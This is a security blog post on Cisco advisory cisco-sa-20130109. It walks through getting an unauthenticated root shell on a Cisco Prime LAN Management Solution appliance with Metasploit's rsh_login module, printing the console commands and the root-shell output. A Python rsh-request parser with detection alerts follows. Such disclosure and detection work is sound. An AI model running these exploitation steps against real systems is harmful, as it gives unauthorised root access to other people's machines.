On January 9th Cisco released advisory cisco-sa-20130109 to address a vulnerability in the "rsh" service running on their Cisco Prime LAN Management Solution virtual appliance. The bug is as bad as it gets - anyone who can access the rsh service can execute commands as the root user account without authentication. The example below demonstrates how to exploit this flaw using Metasploit.

First off, the rsh service requires client connections to use a privileged source port. This means using the Metasploit Pro, Express, or Community web interface, or running the Metasploit console as root.

Metasploit Pro users should click on Modules and search for rsh_login. The rsh Authentication Scanner module should be selected. For Metasploit console users, enter the following command to select the rsh module:

$ sudo /opt/metasploit*/msfconsole
msf> use auxiliary/scanner/rservices/rsh_login

Once the module is loaded, enter the IP or IP range that you would like to test, set the USERNAME option to 'root', and let it rip.

In this case, our target has the IP 192.168.71.143:

msf  auxiliary(rsh_login) > set RHOSTS 192.168.71.143
msf  auxiliary(rsh_login) > set USERNAME root
msf  auxiliary(rsh_login) > exploit

[*] 192.168.71.143:514 - Starting rsh sweep
[*] 192.168.71.143:514 RSH - Attempting rsh with username 'root' from 'root'
[+] 192.168.71.143:514, rsh 'root' from 'root' with no password.
[*] Command shell session 1 opened (192.168.71.142:1023 -> 192.168.71.143:514) at 2013-01-16 12:23:31 -0800
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf  auxiliary(rsh_login) > sessions -i 1
[*] Starting interaction with 1...
sh: no job control in this shell
sh-3.2# id
uid=0(root) gid=0(root) groups=0(root)

...and that is it. You are hacking like it's 1985 (when rservices were still common in production environments).
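To see why "no password" is the whole story, here is an added example (not from the original post, and not Metasploit code): a small Python parser for the request an rsh client sends on TCP/514, in the classic BSD rcmd format of four NUL-terminated fields, plus the checks a monitoring rule could apply to each request it sees on a tap. The sample payload mirroring the session above (source port 1023, root from root, running `id`) is constructed for the example.

```python
from dataclasses import dataclass
from typing import List


@dataclass
class RshRequest:
    src_port: int      # TCP source port of the client connection
    stderr_port: int   # secondary port for stderr (0 = none)
    client_user: str   # user name the client claims to be
    server_user: str   # account the client asks to run as
    command: str       # command to execute


def parse_rsh_request(src_port: int, payload: bytes) -> RshRequest:
    """Split an rsh request: "<stderr port>\\0<client user>\\0<server user>\\0<command>\\0".

    Nothing in the request is a secret: every field is chosen by the client.
    """
    fields = payload.split(b"\0")
    # four fields, each NUL-terminated, so split() yields a trailing empty element
    if len(fields) < 5 or fields[4] != b"":
        raise ValueError("not a well-formed rsh request")
    stderr_port = int(fields[0] or b"0")
    return RshRequest(src_port, stderr_port,
                      fields[1].decode("ascii", "replace"),
                      fields[2].decode("ascii", "replace"),
                      fields[3].decode("ascii", "replace"))


def assess(req: RshRequest) -> List[str]:
    """Findings a detection rule would raise for one rsh request."""
    findings = []
    # The only checks a stock rshd makes: the source port must be < 1024
    # (hence the root/privileged-port requirement in the post) and the
    # client/server user pair must match a trust file. No password anywhere.
    if req.src_port >= 1024:
        findings.append("unprivileged source port (stock rshd would reject)")
    if req.server_user == "root":
        findings.append("rsh login requested as root with no password")
    return findings


# Constructed sample matching the session in the post: client port 1023,
# rsh 'root' from 'root', command "id".
SAMPLE_PAYLOAD = b"0\0root\0root\0id\0"

if __name__ == "__main__":
    req = parse_rsh_request(1023, SAMPLE_PAYLOAD)
    print(req)
    for finding in assess(req):
        print("ALERT:", finding)
```

Any request for root on TCP/514 is worth an alert on a network where rsh should not exist at all; the parser gives you the fields to log.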

-HD